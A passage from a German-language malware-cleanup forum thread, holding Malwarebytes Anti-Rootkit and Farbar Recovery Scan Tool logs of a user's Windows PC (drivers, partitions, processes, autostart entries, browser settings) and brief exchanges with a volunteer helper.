\SystemRoot\System32\DriverStore\FileRepository\compositebus.inf_amd64_de4c68ea4fb1be53\CompositeBus.sys
\SystemRoot\System32\drivers\kdnic.sys
\SystemRoot\System32\drivers\umbus.sys
\SystemRoot\System32\drivers\intelppm.sys
\SystemRoot\System32\drivers\wmiacpi.sys
\SystemRoot\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_24ddebfb518b5a55\nvlddmkm.sys
\SystemRoot\System32\drivers\HDAudBus.sys
\SystemRoot\System32\drivers\portcls.sys
\SystemRoot\System32\drivers\drmk.sys
\SystemRoot\System32\drivers\ks.sys
\SystemRoot\System32\drivers\USBXHCI.SYS
\SystemRoot\system32\drivers\ucx01000.sys
\SystemRoot\System32\drivers\TeeDriverW8x64.sys
\SystemRoot\System32\drivers\usbehci.sys
\SystemRoot\System32\drivers\USBPORT.SYS
\SystemRoot\System32\drivers\e2xw10x64.sys
\SystemRoot\System32\drivers\asmtxhci.sys
\SystemRoot\system32\DRIVERS\AVerPL33_x64.sys
\SystemRoot\system32\DRIVERS\USBD.SYS
\SystemRoot\system32\drivers\ksthunk.sys
\SystemRoot\System32\drivers\ETDSMBus.sys
\SystemRoot\system32\drivers\nvvad64v.sys
\SystemRoot\System32\drivers\nvvhci.sys
\SystemRoot\System32\drivers\NdisVirtualBus.sys
\SystemRoot\System32\drivers\swenum.sys
\SystemRoot\system32\drivers\LGBusEnum.sys
\SystemRoot\system32\drivers\LGJoyXlCore.sys
\SystemRoot\System32\drivers\rdpbus.sys
\SystemRoot\System32\drivers\SaiMini.sys
\SystemRoot\System32\drivers\HIDCLASS.SYS
\SystemRoot\System32\drivers\HIDPARSE.SYS
\SystemRoot\System32\drivers\usbhub.sys
\SystemRoot\system32\drivers\nvhda64v.sys
\SystemRoot\System32\drivers\UsbHub3.sys
\SystemRoot\system32\drivers\RTKVHD64.sys
\SystemRoot\system32\drivers\MBfilt64.sys
\SystemRoot\System32\drivers\asmthub3.sys
\SystemRoot\System32\drivers\kbdhid.sys
\SystemRoot\System32\drivers\kbdclass.sys
\SystemRoot\System32\drivers\mouhid.sys
\SystemRoot\System32\drivers\mouclass.sys
\SystemRoot\System32\drivers\usbccgp.sys
\SystemRoot\System32\drivers\hidusb.sys
\SystemRoot\system32\DRIVERS\lvuvc64.sys
\SystemRoot\system32\drivers\usbaudio.sys
\SystemRoot\system32\DRIVERS\lvrs64.sys
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\win32kfull.sys
\SystemRoot\System32\win32kbase.sys
\SystemRoot\System32\Drivers\dump_diskdump.sys
\SystemRoot\System32\Drivers\dump_iaStorA.sys
\SystemRoot\System32\Drivers\dump_dumpfve.sys
\SystemRoot\System32\drivers\dxgmms2.sys
\SystemRoot\System32\drivers\monitor.sys
\SystemRoot\System32\TSDDD.dll
\SystemRoot\System32\cdd.dll
\SystemRoot\system32\drivers\mmcss.sys
\SystemRoot\system32\drivers\luafv.sys
\SystemRoot\system32\drivers\wcifs.sys
\SystemRoot\system32\drivers\storqosflt.sys
\SystemRoot\system32\DRIVERS\avgntflt.sys
\SystemRoot\System32\drivers\registry.sys
\SystemRoot\system32\drivers\lltdio.sys
\SystemRoot\system32\drivers\mslldp.sys
\SystemRoot\system32\drivers\rspndr.sys
\SystemRoot\System32\DRIVERS\wanarp.sys
\SystemRoot\system32\DRIVERS\nwifi.sys
\SystemRoot\system32\drivers\ndisuio.sys
\SystemRoot\system32\drivers\HTTP.sys
\SystemRoot\system32\DRIVERS\bowser.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\System32\drivers\mpsdrv.sys
\SystemRoot\system32\DRIVERS\mrxsmb20.sys
\SystemRoot\system32\DRIVERS\avnetflt.sys
\SystemRoot\System32\DRIVERS\srvnet.sys
\??\C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys
\SystemRoot\system32\DRIVERS\mrxsmb10.sys
\SystemRoot\system32\drivers\peauth.sys
\SystemRoot\System32\drivers\tcpipreg.sys
\SystemRoot\system32\drivers\Ndu.sys
\SystemRoot\System32\DRIVERS\srv2.sys
\SystemRoot\System32\DRIVERS\srv.sys
\SystemRoot\system32\drivers\WudfPf.sys
\SystemRoot\System32\drivers\condrv.sys
\SystemRoot\System32\drivers\tunnel.sys
\SystemRoot\system32\drivers\LGVirHid.sys
\??\C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys
\??\C:\WINDOWS\system32\drivers\mbamchameleon.sys
\??\C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys
----------- End -----------
Done!

Scan started
Database versions:
  main:    v2017.08.01.04
  rootkit: v2017.05.27.01

<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xffffbd0f80dda060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffbd0f80d989f0, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffbd0f80dda060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xffffbd0f7ca6d5c0, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffbd0f7f691060, DeviceName: \Device\00000036\, DriverName: \Driver\iaStorA\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
Done!
Drive 0
This is a System drive
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: BE291492

Partition information:

    Partition 0 type is Primary (0x7)
    Partition is ACTIVE.
    Partition starts at LBA: 2048  Numsec = 716800
    Partition is bootable
    Partition file system is NTFS

    Partition 1 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 718848  Numsec = 498475696
    Partition is not bootable
    Partition file system is NTFS

    Partition 2 type is Other (0x27)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 499195904  Numsec = 919552
    Partition is not bootable
    Partition file system is NTFS

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable

Disk Size: 256060514304 bytes
Sector size: 512 bytes

Done!
Physical Sector Size: 512
Drive: 1, DevicePointer: 0xffffbd0f80dd9060, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffbd0f80d969f0, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffbd0f80dd9060, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
DevicePointer: 0xffffbd0f7f68cc30, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffbd0f7f68e060, DeviceName: \Device\00000037\, DriverName: \Driver\iaStorA\
------------ End ----------
Alternate DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
Drive 1
Scanning MBR on drive 1...
Inspecting partition table:
This drive is a GPT Drive.
MBR Signature: 55AA
Disk Signature: 0

GPT Protective MBR Partition information:

    Partition 0 type is EFI-GPT (0xee)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 1  Numsec = 4294967295

    Partition 1 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

GPT Partition information:

    GPT Header Signature 4546492050415254
    GPT Header Revision 65536 Size 92 CRC 2062005913
    GPT Header CurrentLba = 1 BackupLba 15628064767
    GPT Header FirstUsableLba 34  LastUsableLba 15628064734
    GPT Header Guid d80aac34-b589-4897-a2e0-164b73895348
    GPT Header Contains 128 partition entries starting at LBA 2
    GPT Header Partition entry size = 128

    Backup GPT header Signature 4546492050415254
    Backup GPT header Revision 65536 Size 92 CRC 2062005913
    Backup GPT header CurrentLba = 15628064767 BackupLba 1
    Backup GPT header FirstUsableLba 34  LastUsableLba 15628064734
    Backup GPT header Guid d80aac34-b589-4897-a2e0-164b73895348
    Backup GPT header Contains 128 partition entries starting at LBA 15628064735
    Backup GPT header Partition entry size = 128

    Partition 0 Type e3c9e316-b5c-4db8-817d-f92df0215ae
    Partition ID 73a4163a-cae1-48f4-bd5c-dcb8e3d7543
    FirstLBA 34  Last LBA 262177
    Attributes 0
    Partition Name         Microsoft reserved partition

    Partition 1 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7
    Partition ID f19d7015-d86c-497e-989-1722d24df3b
    FirstLBA 264192  Last LBA 7814162431
    Attributes 0
    Partition Name                 Basic data partition

    Partition 2 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7
    Partition ID a8af2a8a-ee54-438d-9d2a-9d9225f73da9
    FirstLBA 7814162432  Last LBA 15628060671
    Attributes 0
    Partition Name                 Basic data partition

Disk Size: 8001569161216 bytes
Sector size: 512 bytes

Done!
File "C:\Users\Martin Walser\AppData\Local\Comms\UnistoreDB\store.vol" is sparse (flags = 32768)
File "C:\Windows\System32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat" is sparse (flags = 32768)
Scan finished
=======================================


Removal queue found; removal started
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-0-2048-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-1-718848-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-2-499195904-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-r.mbam...
Removal finished

Die Vorschaufunktion der Bilder scheint hier nicht zu funktionieren. Hier der Bilderlink:
https://www.dropbox.com/sh/dksnxf48h48nwcg/AACuuxEnLIG-M1E9LUG5kUtRa?dl=0

cosinus · 01.08.2017, 13:07

Äh und schon wieder hast du nicht richtig gelesen

Sollte nochmal was gefunden werden, wiederhole den CleanUp Prozess.

Lost_Viking · 01.08.2017, 13:18

Habe ich doch gemacht.

Zitat:

Zitat von Lost_Viking

Der zweite Durchgang hat nicht Verdächtiges mehr gemeldet

Hier das Log ohne Befund. Dachte das müsst Ihr nicht mehr sehen.

Code:

ATTFilter

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2017.08.01.04
  rootkit: v2017.05.27.01

Windows 10 x64 NTFS
Internet Explorer 11.483.15063.0
M*** W**** :: SILENTDRAGON [administrator]

01.08.2017 12:41:02
mbar-log-2017-08-01 (12-41-02).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 308076
Time elapsed: 7 minute(s), 49 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)

cosinus · 01.08.2017, 13:52

ok ich will immer das Log dazu sehen

geht FRST jetzt?

Lost_Viking · 01.08.2017, 13:55

Hehe, nicht's für ungut mit richtig lesen

Zitat:

Zitat von Lost_Viking

Der zweite Durchgang hat nicht Verdächtiges mehr gemeldet

Edit: Jetzt würde FRST64.exe gehen. Warte diesmal aber auf Eure Anweisung

Ja es geht

cosinus · 01.08.2017, 13:56

und das Log dazu??!

Lost_Viking · 01.08.2017, 14:47

Code:

ATTFilter

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 31-07-2017
durchgeführt von **** (Administrator) auf SILENTDRAGON (01-08-2017 15:01:50)
Gestartet von C:\Users\****\Desktop
Geladene Profile: **** &  (Verfügbare Profile: ****)
Platform: Windows 7 Ultimate (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Chrome)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(IObit) C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avguard.exe
(IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\SoftwareUpdater\Avira.SoftwareUpdater.ServiceHost.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\VPN\Avira.VpnService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.SpeedupService.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(Electronic Arts) G:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.UI.Systray.exe
(IObit) C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe
(IObit) C:\Program Files (x86)\IObit\Smart Defrag\SmartDefrag.exe
(Microsoft Corporation) C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avshadow.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Logitech, Inc.) C:\Program Files\Common Files\logishrd\KHAL3\KHALMNPR.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Spotify Ltd) C:\Users\****\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avgnt.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(IObit) C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(Logitech Inc.) C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe
() C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
(Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
(Saitek) C:\Program Files\SmartTechnology\Software\SaiMfd.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(TomTom) C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Google, Inc) C:\Users\****\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Dropbox, Inc.) C:\Users\****\AppData\Local\Dropbox\Update\DropboxUpdate.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Wargaming.net) G:\Games\World_of_Warships\WargamingGameUpdater.exe
(Akamai Technologies, Inc.) C:\Users\****\AppData\Local\Akamai\netsession_win.exe
(Akamai Technologies, Inc.) C:\Users\****\AppData\Local\Akamai\netsession_win.exe
(Valve Corporation) G:\Program Files (x86)\Steam\Steam.exe
(© 2015 Microsoft Corporation) C:\Users\****\AppData\Local\Microsoft\BingSvc\BingSvc.exe
(Valve Corporation) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Spotify Ltd) C:\Users\****\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Qualcomm Atheros) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Digital Wave Ltd.) C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
(Qualcomm Atheros) C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\SMService.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\ClassicStart.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\StartMenu_Hook.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\InstallServices.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8241.41275.0_x64__8wekyb3d8bbwe\HxOutlook.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8241.41275.0_x64__8wekyb3d8bbwe\HxTsr.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Hammer & Chisel, Inc.) C:\Users\****\AppData\Local\Discord\app-0.0.297\Discord.exe
(Hammer & Chisel, Inc.) C:\Users\****\AppData\Local\Discord\app-0.0.297\Discord.exe
(Hammer & Chisel, Inc.) C:\Users\****\AppData\Local\Discord\app-0.0.297\Discord.exe
(Dropbox, Inc.) C:\Users\****\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Dropbox, Inc.) C:\Users\****\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Dropbox, Inc.) C:\Users\****\AppData\Roaming\Dropbox\bin\Dropbox.exe
() C:\Users\****\AppData\Roaming\Dropbox\bin\QtWebEngineProcess.exe
(Spotify Ltd) C:\Users\****\AppData\Roaming\Spotify\Spotify.exe
(Spotify Ltd) C:\Users\****\AppData\Roaming\Spotify\Spotify.exe
(Spotify Ltd) C:\Users\****\AppData\Roaming\Spotify\Spotify.exe
(Spotify Ltd) C:\Users\****\AppData\Roaming\Spotify\Spotify.exe
(ZeniMax Online Studios) G:\Program Files (x86)\The Elder Scrolls Online\Launcher\Bethesda.net_Launcher.exe
(IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9197568 2017-05-15] (Realtek Semiconductor)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2014-05-28] (Intel Corporation)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3113592 2015-08-26] (Logitech, Inc.)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [17406072 2017-01-24] (Logitech Inc.)
HKLM-x32\...\Run: [Avira SystrayStartTrigger] => C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe [97512 2017-06-13] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\Antivirus\avgnt.exe [918008 2017-07-14] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [Avira System Speedup User Starter] => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.Core.Common.Starter.exe [66656 2017-06-28] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-07-12] (Oracle Corporation)
HKLM-x32\...\Run: [TrojanScanner] => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [3673656 2017-08-01] (Simply Super Software)
HKLM-x32\...\Winlogon: [Userinit] 
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9818328 2017-06-30] (Piriform Ltd)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Advanced SystemCare 10] => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe [3924256 2017-05-17] (IObit)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Spotify Web Helper] => C:\Users\****\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-04-19] (Spotify Ltd)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9818328 2017-06-30] (Piriform Ltd)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Advanced SystemCare 10] => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe [3924256 2017-05-17] (IObit)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Spotify Web Helper] => C:\Users\****\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-04-19] (Spotify Ltd)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
Startup: C:\Users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2017-08-01]
ShortcutTarget: Dropbox.lnk -> C:\Users\****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60
Tcpip\..\Interfaces\{f81baef3-2886-44c5-9a55-1cfe2ed39eeb}: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60
ManualProxies: 

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.ch/
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.ch/
SearchScopes: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Kein Name -> {AF949550-9094-4807-95EC-D1C317803333} -> Keine Datei
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_141\bin\ssv.dll [2017-07-25] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_141\bin\jp2ssv.dll [2017-07-25] (Oracle Corporation)

FireFox:
========
FF ProfilePath: C:\Users\****\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default [2017-08-01]
FF Extension: (Avira Browser Safety) - C:\Users\****\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2016-08-08] [ist nicht signiert]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-09-03] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-09-03] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.141.2 -> C:\Program Files (x86)\Java\jre1.8.0_141\bin\dtplugin\npDeployJava1.dll [2017-07-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.141.2 -> C:\Program Files (x86)\Java\jre1.8.0_141\bin\plugin2\npjp2.dll [2017-07-25] (Oracle Corporation)
